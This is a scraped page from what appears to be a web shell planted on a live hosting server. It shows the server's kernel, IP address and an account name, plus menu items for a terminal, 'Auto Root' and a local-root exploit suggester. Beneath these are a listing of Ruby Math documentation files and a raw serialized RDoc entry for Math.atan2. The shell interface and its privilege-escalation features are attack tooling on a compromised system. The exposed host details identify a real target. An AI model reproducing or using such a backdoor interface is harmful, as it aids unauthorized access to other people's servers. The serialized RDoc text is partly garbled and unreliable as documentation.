Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Math /
Delete
Unzip
Name
Size
Permission
Date
Action
DomainError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
acos-c.ri
770
B
-rw-r--r--
2026-04-07 17:42
acosh-c.ri
743
B
-rw-r--r--
2026-04-07 17:42
asin-c.ri
780
B
-rw-r--r--
2026-04-07 17:42
asinh-c.ri
798
B
-rw-r--r--
2026-04-07 17:42
atan-c.ri
1005
B
-rw-r--r--
2026-04-07 17:42
atan2-c.ri
1.04
KB
-rw-r--r--
2026-04-07 17:42
atanh-c.ri
772
B
-rw-r--r--
2026-04-07 17:42
cbrt-c.ri
1.02
KB
-rw-r--r--
2026-04-07 17:42
cdesc-Math.ri
6.13
KB
-rw-r--r--
2026-04-07 17:42
cos-c.ri
962
B
-rw-r--r--
2026-04-07 17:42
cosh-c.ri
867
B
-rw-r--r--
2026-04-07 17:42
erf-c.ri
794
B
-rw-r--r--
2026-04-07 17:42
erfc-c.ri
836
B
-rw-r--r--
2026-04-07 17:42
exp-c.ri
920
B
-rw-r--r--
2026-04-07 17:42
frexp-c.ri
1.3
KB
-rw-r--r--
2026-04-07 17:42
gamma-c.ri
1.06
KB
-rw-r--r--
2026-04-07 17:42
hypot-c.ri
1.17
KB
-rw-r--r--
2026-04-07 17:42
ldexp-c.ri
1.24
KB
-rw-r--r--
2026-04-07 17:42
lgamma-c.ri
1.58
KB
-rw-r--r--
2026-04-07 17:42
log-c.ri
1.01
KB
-rw-r--r--
2026-04-07 17:42
log10-c.ri
794
B
-rw-r--r--
2026-04-07 17:42
log2-c.ri
786
B
-rw-r--r--
2026-04-07 17:42
sin-c.ri
964
B
-rw-r--r--
2026-04-07 17:42
sinh-c.ri
874
B
-rw-r--r--
2026-04-07 17:42
sqrt-c.ri
917
B
-rw-r--r--
2026-04-07 17:42
tan-c.ri
1.04
KB
-rw-r--r--
2026-04-07 17:42
tanh-c.ri
853
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI" atan2:ETI"Math::atan2;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"SReturns the {arc tangent}[https://en.wikipedia.org/wiki/Atan2] of +y+ and +x+ ;TI"`in {radians}[https://en.wikipedia.org/wiki/Trigonometric_functions#Radians_versus_degrees].;To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type:BULLET:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I"3Domain of +y+: <tt>[-INFINITY, INFINITY]</tt>.;To;;0; [o; ; [I"3Domain of +x+: <tt>[-INFINITY, INFINITY]</tt>.;To;;0; [o; ; [I"Range: <tt>[-PI, PI]</tt>.;T@o; ; [I"Examples:;T@o:RDoc::Markup::Verbatim; [ I":atan2(-1.0, -1.0) # => -2.356194490192345 # -3*PI/4 ;TI"8atan2(-1.0, 0.0) # => -1.5707963267948966 # -PI/2 ;TI"8atan2(-1.0, 1.0) # => -0.7853981633974483 # -PI/4 ;TI"4atan2(0.0, -1.0) # => 3.141592653589793 # PI;T:@format0: @fileI"math.c;T:0@omit_headings_from_table_of_contents_below0I"Math.atan2(y, x) -> float ;T0[ I" (p1, p2);T@*FI" Math;TcRDoc::NormalModule00